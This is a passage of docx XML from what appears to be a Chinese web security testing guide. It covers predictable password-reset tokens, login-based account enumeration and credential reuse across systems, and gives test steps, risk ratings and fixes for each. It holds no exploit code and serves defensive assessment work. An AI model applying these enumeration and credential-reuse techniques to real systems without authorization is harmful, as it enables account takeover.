          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="006F6387" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00D11EE9" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过猜测重置密码链接可重置他人账户的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286FAA36" w14:textId="77777777" w:rsidR="006F6387" w:rsidRPr="009170E6" w:rsidRDefault="006F6387" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE19EA0" w14:textId="4FCD28A5" w:rsidR="006F6387" w:rsidRPr="009170E6" w:rsidRDefault="001D5E0E" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在需要收件人点击确认的链接中，无安全随机数，或</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单可预测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50A308" w14:textId="5C21701A" w:rsidR="006F6387" w:rsidRDefault="006F6387" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="001D5E0E" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置密码链接中的</w:t>
      </w:r>
      <w:r w:rsidR="001D5E0E" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="001D5E0E" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用安全随机数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673BC98C" w14:textId="1724345B" w:rsidR="009325C6" w:rsidRPr="001D5E0E" w:rsidRDefault="009325C6" w:rsidP="009170E6">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1B9204D2" w14:textId="34B59EEA" w:rsidR="00B93150" w:rsidRPr="00AD537C" w:rsidRDefault="00B93150" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc498434487"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>数据猜解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="4BCFBFD5" w14:textId="1770341E" w:rsidR="00B93150" w:rsidRPr="000C4ADB" w:rsidRDefault="00B93150" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc498434488"/>
      <w:r w:rsidRPr="000C4ADB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号枚举</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="09C1BAF9" w14:textId="1D8DC340" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00B93150" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00B41C15" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在于系统登录页面，利用登陆时输入系统存在的用户名错误密码和不存在的用户名错误密码，返回不同的出错信息可枚举出系统中存在的账号信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E9149" w14:textId="77777777" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00B93150" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D6069" w14:textId="77777777" w:rsidR="00B41C15" w:rsidRPr="00B47984" w:rsidRDefault="00B41C15" w:rsidP="00B47984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到网站或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B893A8" w14:textId="77777777" w:rsidR="00B41C15" w:rsidRPr="00B47984" w:rsidRDefault="00B41C15" w:rsidP="00B47984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统登录页面，通过手工方式，利用系统中存在的用户名和不存在的用户名，密码随意，尝试登录，查看其回显内容。例如：输入存在的用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，回显如下：密码错误；输入不存在的用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，回显如下：用户不存在。如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B056302" w14:textId="3ECF66BE" w:rsidR="00B41C15" w:rsidRPr="00B47984" w:rsidRDefault="00B41C15" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2A33C6" wp14:editId="18DBAED9">
            <wp:extent cx="4089400" cy="78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787400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D888B83" w14:textId="37AA1943" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00B41C15" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70112A37" wp14:editId="78BB6AE3">
            <wp:extent cx="4178300" cy="6477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0" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA74B2" w14:textId="580F36FB" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00C24790" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B93150" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00046840" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者根据</w:t>
      </w:r>
      <w:r w:rsidR="00046840" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00046840" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序返回的上述提示信息即可枚举系统中存在的登录用户名，然后针对枚举出来的登录用户名，对其密码进行暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BB6F0" w14:textId="77777777" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00B93150" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15461312" w14:textId="720C2E59" w:rsidR="00B93150" w:rsidRPr="00B47984" w:rsidRDefault="00EA7640" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可通过返回关键字对系统可用账号进行枚举。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40588E" w14:textId="3329106B" w:rsidR="00B93150" w:rsidRDefault="00B93150" w:rsidP="00B47984">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00361D66" w:rsidRPr="00B47984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议对网站登录页面的判断回显信息修改为一致：用户名或密码错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F95642" w14:textId="36717E13" w:rsidR="009325C6" w:rsidRPr="00B47984" w:rsidRDefault="009325C6" w:rsidP="00B47984">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7CBBDAE" w14:textId="0DFED44E" w:rsidR="00757422" w:rsidRPr="000C4ADB" w:rsidRDefault="00D173BE" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc498434489"/>
      <w:r w:rsidRPr="000C4ADB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>账号密码共用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0DBB8D0F" w14:textId="049AA72F"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00523231" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的业务系统存在相同的用户名密码，或者不同用户名使用相同的初始密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BE32F" w14:textId="782FB3F7"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00645451" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用同一个用户名密码登录不同</w:t>
      </w:r>
      <w:r w:rsidR="003408FF" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务</w:t>
      </w:r>
      <w:r w:rsidR="00645451" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidR="003408FF" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，看是否均可成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D019A8B" w14:textId="101E37D1" w:rsidR="00757422" w:rsidRPr="00190C71" w:rsidRDefault="00C24790" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A82242" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者在</w:t>
      </w:r>
      <w:r w:rsidR="004E6952" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到一个业务系统的用户名密码后可尝试</w:t>
      </w:r>
      <w:r w:rsidR="00EF6904" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录其他业务系统</w:t>
      </w:r>
      <w:r w:rsidR="004E6952" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，造成其他业务系统信息泄漏</w:t>
      </w:r>
      <w:r w:rsidR="000C0436" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001B7251" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者使用初始密码遍历用户名</w:t>
      </w:r>
      <w:r w:rsidR="00984F10" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，批量获取可登录系统的用户名密码</w:t>
      </w:r>
      <w:r w:rsidR="001B7251" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192C426" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE86F5" w14:textId="1A0D0348" w:rsidR="00B35715" w:rsidRPr="00190C71" w:rsidRDefault="00B35715" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：多台服务器的后台或其他服务口令相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC4A75" w14:textId="1BB624D6" w:rsidR="00B35715" w:rsidRPr="00190C71" w:rsidRDefault="00E26222" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00B35715" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：不同用户名使用相同初始密码，且第一次登陆未强制密码修改或强制修改机制可绕过继续使用初始密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267BD72C" w14:textId="4AC9E122" w:rsidR="00757422" w:rsidRPr="00190C71" w:rsidRDefault="00B35715" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
